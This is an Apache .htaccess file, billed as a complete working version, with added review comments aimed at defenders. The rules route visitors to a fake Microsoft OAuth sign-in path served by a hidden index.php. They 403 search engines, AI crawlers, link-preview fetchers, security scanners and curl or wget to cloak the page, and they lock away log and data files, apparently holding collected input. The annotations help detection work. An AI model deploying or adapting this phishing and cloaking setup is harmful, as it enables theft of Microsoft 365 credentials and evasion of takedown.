# .htaccess - Complete working version

RewriteEngine On

# Redirect https://yourdomain.com/?ai=xd to full OAuth URL
# NOTE(review): the redirect target is a path on THIS host, not
# login.microsoftonline.com, yet its shape (/oauth2/v2.0/authorize with
# client_id, scope, redirect_uri, response_type, response_mode, prompt) copies
# the Microsoft identity platform authorize endpoint. Combined with the
# rewrites below that hand that path to index.php, the site presents itself as
# a Microsoft sign-in flow. For defenders: a third-party host that answers
# /oauth2/v2.0/authorize itself is a strong indicator to alert on in proxy and
# web-server logs; the "ai" query parameter is carried through on the redirect
# and is a useful pivot when correlating visits.
RewriteCond %{QUERY_STRING} ^ai=([^&]+)$ [NC]
RewriteCond %{REQUEST_URI} ^/$
RewriteRule ^$ /oauth2/v2.0/authorize?client_id=9199bf20-a13f-4107-85dc-02114787ef48&scope=https%3A%2F%2Foutlook.office.com%2F.default%20openid%20profile%20offline_access&redirect_uri=https%3A%2F%2Foutlook.office.com%2Fmail%2F&response_type=code&response_mode=query&prompt=select_account&ai=%1 [R=302,L]

# Handle the OAuth URL and rewrite to index.php
# Every request under /oauth2/v2.0/authorize is served by index.php; QSA keeps
# the full query string (including the parameters above) available to it.
# index.php is not shown here, so what it does with those values cannot be
# confirmed from this file.
RewriteCond %{REQUEST_URI} ^/oauth2/v2.0/authorize [NC]
RewriteRule ^.*$ index.php [QSA,L]

# Fallback for any OAuth-like paths
# Also catches the tenant-prefixed forms (/common, /organizations, /consumers)
# that the real Microsoft endpoint uses, so links copied from a genuine
# sign-in URL still land on index.php.
RewriteCond %{REQUEST_URI} ^/(common|organizations|consumers)/oauth2/v2.0/authorize [NC]
RewriteRule ^.*$ index.php [QSA,L]

# Block known bad bots
# NOTE(review): despite the comment, this list is search-engine crawlers, AI
# crawlers and social/messaging link-preview fetchers, not malicious bots.
# Returning 403 to them keeps the page out of search indexes and out of the
# URL-reputation checks that run when a link is shared. From a detection
# standpoint, a site that 403s Googlebot and link-preview agents while serving
# ordinary browsers is cloaking.
RewriteCond %{HTTP_USER_AGENT} (Googlebot|bingbot|AhrefsBot|SemrushBot|GPTBot|ChatGPT-User|anthropic-ai|ClaudeBot|facebot|facebookexternalhit|Twitterbot|WhatsApp|TelegramBot) [NC]
RewriteRule .* - [F,L]

# Block security scanners
# Matches common assessment tools and generic HTTP clients (curl, wget,
# python-requests) by User-Agent only. Analysts retrieving a copy of this site
# for review will get a 403 unless the request carries a browser-like
# User-Agent and a non-empty Accept header (see the two rules below).
RewriteCond %{HTTP_USER_AGENT} (sqlmap|nikto|nessus|burp|zap|wpscan|nmap|masscan|curl|wget|python-requests) [NC]
RewriteRule .* - [F,L]

# Block empty user agents
RewriteCond %{HTTP_USER_AGENT} ^$
RewriteRule .* - [F,L]

# Block requests with no accept header
# Together with the rule above, this refuses most non-browser clients outright.
RewriteCond %{HTTP_ACCEPT} ^$
RewriteRule .* - [F,L]

# Security headers
# Requires mod_headers to be loaded. X-XSS-Protection is a legacy header that
# current browsers ignore; no-referrer-when-downgrade is the browser default
# policy, so that line does not change behaviour.
Header set X-Content-Type-Options "nosniff"
Header set X-Frame-Options "DENY"
Header set X-XSS-Protection "1; mode=block"
Header set Referrer-Policy "no-referrer-when-downgrade"

# Disable directory listing
Options -Indexes

# Protect sensitive files
# Order/Deny is the Apache 2.2 access-control syntax. NOTE(review): the list
# covers plain-text and data formats (.txt, .log, .json) as well as config
# files; presumably this is where index.php writes whatever it collects, but
# that file is not shown here, so confirm against it. Responders examining a
# host running this config should look for files with these extensions next to
# index.php.
<FilesMatch "\.(ini|log|sql|bak|config|yml|json|txt)$">
    Order Allow,Deny
    Deny from all
</FilesMatch>

# Block access to logs directory
# Returns 403 for anything under /logs/. Presumably the output directory used
# by index.php — worth preserving for evidence if this host is being
# investigated.
RedirectMatch 403 ^/logs/.*$